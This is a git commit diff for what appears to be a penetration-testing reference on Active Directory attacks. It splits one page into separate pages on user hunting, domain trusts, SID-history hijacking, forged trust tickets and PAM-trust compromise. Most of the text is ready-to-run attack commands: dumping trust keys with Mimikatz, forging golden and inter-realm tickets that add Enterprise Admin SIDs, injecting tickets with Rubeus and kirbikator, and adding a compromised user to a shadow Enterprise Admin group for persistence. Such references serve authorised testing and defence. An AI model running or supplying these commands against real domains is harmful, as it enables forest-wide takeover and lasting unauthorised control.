AD - Pages v0.6

2023-12-03 20:54:06 +01:00 · 2023-12-03 20:54:06 +01:00 · 38068dc5a3
parent 1ecb9fd021
commit 38068dc5a3
6 changed files with 166 additions and 181 deletions
--- a/docs/active-directory/Active
+++ b/docs/active-directory/Active
@ -1,17 +1,5 @@
 # Active Directory Attacks

-## Summary
-
- [Active Directory Attacks](#active-directory-attacks)
-  - [Summary](#summary)
-  - [Tools](#tools)
-  - [User Hunting](#user-hunting)
-  - [Trust relationship between domains](#trust-relationship-between-domains)
-  - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
-  - [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket)
-  - [Privileged Access Management (PAM) Trust](#privileged-access-management-pam-trust)
-  - [References](#references)
-
 ## Tools

 * [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows)
@ -99,175 +87,6 @@
    ```


-## User Hunting
-
-Sometimes you need to find a machine where a specific user is logged in.    
-You can remotely query every machines on the network to get a list of the users's sessions.
-
-* CrackMapExec
-  ```ps1
-  cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions
-  SMB         10.10.10.10    445    WIN-8OJFTLMU1IG  [+] Enumerated sessions
-  SMB         10.10.10.10    445    WIN-8OJFTLMU1IG  \\10.10.10.10            User:Administrator
-  ```
-* Impacket Smbclient
-  ```ps1
-  $ impacket-smbclient Administrator@10.10.10.10
-  # who
-  host:  \\10.10.10.10, user: Administrator, active:     1, idle:     0
-  ```
-* PowerView Invoke-UserHunter
-  ```ps1
-  # Find computers were a Domain Admin OR a specified user has a session
-  Invoke-UserHunter
-  Invoke-UserHunter -GroupName "RDPUsers"
-  Invoke-UserHunter -Stealth
-  ```
-
-## Trust relationship between domains
-
-* One-way
-  * Domain B trusts A
-  * Users in Domain A can access resources in Domain B
-  * Users in Domain B cannot access resources in Domain A
-* Two-way
-  * Domain A trusts Domain B
-  * Domain B trusts Domain A
-  * Authentication requests can be passed between the two domains in both directions
-
-### Enumerate trusts between domains
-
-* Native `nltest`
-  ```powershell
-  nltest /trusted_domains
-  ```
-* PowerShell `GetAllTrustRelationships`
-  ```powershell
-  ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
-
-  SourceName          TargetName                    TrustType      TrustDirection
-  ----------          ----------                    ---------      --------------
-  domainA.local      domainB.local                  TreeRoot       Bidirectional
-  ```
-* Crackmapexec module `enum_trusts`
-  ```powershell
-  cme ldap <ip> -u <user> -p <pass> -M enum_trusts 
-  ```
-
-### Exploit trusts between domains
-
-:warning: Require a Domain-Admin level access to the current domain.
-
-| Source     | Target  | Technique to use  | Trust relationship  |
-|---|---|---|---|
-| Root      | Child  | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way)  |
-| Child     | Child  | SID History exploitation (Mimikatz /sids)                 | Inter Realm Parent-Child (2-way)  |
-| Child     | Root   | SID History exploitation (Mimikatz /sids)                 | Inter Realm Tree-Root (2-way)  |
-| Forest A  | Forest B  | PrinterBug + Unconstrained delegation ?  | Inter Realm Forest or External (2-way)  |
-
-
-
-## Child Domain to Forest Compromise - SID Hijacking
-
-Most trees are linked with dual sided trust relationships to allow for sharing of resources.
-By default the first domain created if the Forest Root.
-
-**Requirements**: 
- KRBTGT Hash
- Find the SID of the domain
-    ```powershell
-    $ Convert-NameToSid target.domain.com\krbtgt
-    S-1-5-21-2941561648-383941485-1389968811-502
-
-    # with Impacket
-    lookupsid.py domain/user:password@10.10.10.10
-    ```
- Replace 502 with 519 to represent Enterprise Admins
- Create golden ticket and attack parent domain. 
-    ```powershell
-    kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
-    ```
-
-## Forest to Forest Compromise - Trust Ticket
-
-* Require: SID filtering disabled
-
-From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using 
-Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**.
-
-### Dumping trust passwords (trust keys)
-
-> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts.
-
-```powershell
-lsadump::trust /patch
-
-or find the TRUST_NAME$ machine account hash
-```
-
-### Create a forged trust ticket (inter-realm TGT) using Mimikatz
-
-```powershell
-mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi
-mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
-```
-
-### Use the Trust Ticket file to get a ST for the targeted service
-
-```powershell
-.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
-.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
-```
-
-Inject the ST file and access the targeted service with the spoofed rights.
-
-```powershell
-kirbikator lsa .\ticket.kirbi
-ls \\machine.domain.local\c$
-```
-
-## Privileged Access Management (PAM) Trust
-
-> PAM (Privileged access managment) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon.
-
-Requirements: 
-* Windows Server 2016 or earlier   
-
-If we compromise the bastion we get `Domain Admins` privileges on the other domain
-
-* Default configuration for PAM Trust
-    ```ps1
-    # execute on our forest
-    netdom trust lab.local /domain:bastion.local /ForestTransitive:Yes 
-    netdom trust lab.local /domain:bastion.local /EnableSIDHistory:Yes 
-    netdom trust lab.local /domain:bastion.local /EnablePIMTrust:Yes 
-    netdom trust lab.local /domain:bastion.local /Quarantine:No
-    # execute on our bastion
-    netdom trust bastion.local /domain:lab.local /ForestTransitive:Yes
-    ```
-* Enumerate PAM trusts
-    ```ps1
-    # Detect if current forest is PAM trust
-    Import ADModule
-    Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}
-
-    # Enumerate shadow security principals 
-    Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl
-
-    # Enumerate if current forest is managed by a bastion forest
-    # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External
-    Get-ADTrust -Filter {(ForestTransitive -eq $True)} 
-    ```
-* Compromise
-    * Using the previously found Shadow Security Principal (WinRM account, RDP access, SQL, ...)
-    * Using SID History
-* Persistence
-  ```ps1
-  # Add a compromised user to the group 
-  Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"}
-  ```
-
-
 ## References

 * [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/)
--- a/docs/active-directory/ad-adds-enumerate.md
+++ b/docs/active-directory/ad-adds-enumerate.md
@ -264,6 +264,33 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun
 Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
 ```

+
+## User Hunting
+
+Sometimes you need to find a machine where a specific user is logged in.    
+You can remotely query every machines on the network to get a list of the users's sessions.
+
+* CrackMapExec
+  ```ps1
+  cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions
+  SMB         10.10.10.10    445    WIN-8OJFTLMU1IG  [+] Enumerated sessions
+  SMB         10.10.10.10    445    WIN-8OJFTLMU1IG  \\10.10.10.10            User:Administrator
+  ```
+* Impacket Smbclient
+  ```ps1
+  $ impacket-smbclient Administrator@10.10.10.10
+  # who
+  host:  \\10.10.10.10, user: Administrator, active:     1, idle:     0
+  ```
+* PowerView Invoke-UserHunter
+  ```ps1
+  # Find computers were a Domain Admin OR a specified user has a session
+  Invoke-UserHunter
+  Invoke-UserHunter -GroupName "RDPUsers"
+  Invoke-UserHunter -Stealth
+  ```
+
+
 ## Other Interesting Commands

 - **Find Domain Controllers**
--- a/docs/active-directory/trust-pam.md
+++ b/docs/active-directory/trust-pam.md
@ -0,0 +1,40 @@
+# Trust - Privileged Access Management 
+
+> PAM (Privileged Access Management) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon.
+
+Requirements: 
+* Windows Server 2016 or earlier   
+
+If we compromise the bastion we get `Domain Admins` privileges on the other domain
+
+* Default configuration for PAM Trust
+    ```ps1
+    # execute on our forest
+    netdom trust lab.local /domain:bastion.local /ForestTransitive:Yes 
+    netdom trust lab.local /domain:bastion.local /EnableSIDHistory:Yes 
+    netdom trust lab.local /domain:bastion.local /EnablePIMTrust:Yes 
+    netdom trust lab.local /domain:bastion.local /Quarantine:No
+    # execute on our bastion
+    netdom trust bastion.local /domain:lab.local /ForestTransitive:Yes
+    ```
+* Enumerate PAM trusts
+    ```ps1
+    # Detect if current forest is PAM trust
+    Import ADModule
+    Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}
+
+    # Enumerate shadow security principals 
+    Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl
+
+    # Enumerate if current forest is managed by a bastion forest
+    # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External
+    Get-ADTrust -Filter {(ForestTransitive -eq $True)} 
+    ```
+* Compromise
+    * Using the previously found Shadow Security Principal (WinRM account, RDP access, SQL, ...)
+    * Using SID History
+* Persistence
+  ```ps1
+  # Add a compromised user to the group 
+  Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"}
+  ```
--- a/docs/active-directory/trust-relationship.md
+++ b/docs/active-directory/trust-relationship.md
@ -0,0 +1,42 @@
+# Trust - Relationship
+
+* One-way
+  * Domain B trusts A
+  * Users in Domain A can access resources in Domain B
+  * Users in Domain B cannot access resources in Domain A
+* Two-way
+  * Domain A trusts Domain B
+  * Domain B trusts Domain A
+  * Authentication requests can be passed between the two domains in both directions
+
+
+## Enumerate trusts between domains
+
+* Native `nltest`
+  ```powershell
+  nltest /trusted_domains
+  ```
+* PowerShell `GetAllTrustRelationships`
+  ```powershell
+  ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
+
+  SourceName          TargetName                    TrustType      TrustDirection
+  ----------          ----------                    ---------      --------------
+  domainA.local      domainB.local                  TreeRoot       Bidirectional
+  ```
+* Crackmapexec module `enum_trusts`
+  ```powershell
+  cme ldap <ip> -u <user> -p <pass> -M enum_trusts 
+  ```
+
+
+## Exploit trusts between domains
+
+:warning: Require a Domain-Admin level access to the current domain.
+
+| Source     | Target  | Technique to use  | Trust relationship  |
+|---|---|---|---|
+| Root      | Child  | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way)  |
+| Child     | Child  | SID History exploitation (Mimikatz /sids)                 | Inter Realm Parent-Child (2-way)  |
+| Child     | Root   | SID History exploitation (Mimikatz /sids)                 | Inter Realm Tree-Root (2-way)  |
+| Forest A  | Forest B  | PrinterBug + Unconstrained delegation ?  | Inter Realm Forest or External (2-way)  |
--- a/docs/active-directory/trust-sid-hijacking.md
+++ b/docs/active-directory/trust-sid-hijacking.md
@ -0,0 +1,20 @@
+# Child Domain to Forest Compromise - SID Hijacking
+
+Most trees are linked with dual sided trust relationships to allow for sharing of resources.
+By default the first domain created if the Forest Root.
+
+**Requirements**: 
+- KRBTGT Hash
+- Find the SID of the domain
+    ```powershell
+    $ Convert-NameToSid target.domain.com\krbtgt
+    S-1-5-21-2941561648-383941485-1389968811-502
+
+    # with Impacket
+    lookupsid.py domain/user:password@10.10.10.10
+    ```
+- Replace 502 with 519 to represent Enterprise Admins
+- Create golden ticket and attack parent domain. 
+    ```powershell
+    kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
+    ```
--- a/docs/active-directory/trust-ticket.md
+++ b/docs/active-directory/trust-ticket.md
@ -0,0 +1,37 @@
+# Forest to Forest Compromise - Trust Ticket
+
+* Require: SID filtering disabled
+
+From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using 
+Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**.
+
+## Dumping trust passwords (trust keys)
+
+> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts.
+
+```powershell
+lsadump::trust /patch
+
+or find the TRUST_NAME$ machine account hash
+```
+
+## Create a forged trust ticket (inter-realm TGT) using Mimikatz
+
+```powershell
+mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi
+mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
+```
+
+## Use the Trust Ticket file to get a ST for the targeted service
+
+```powershell
+.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
+.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
+```
+
+Inject the ST file and access the targeted service with the spoofed rights.
+
+```powershell
+kirbikator lsa .\ticket.kirbi
+ls \\machine.domain.local\c$
+```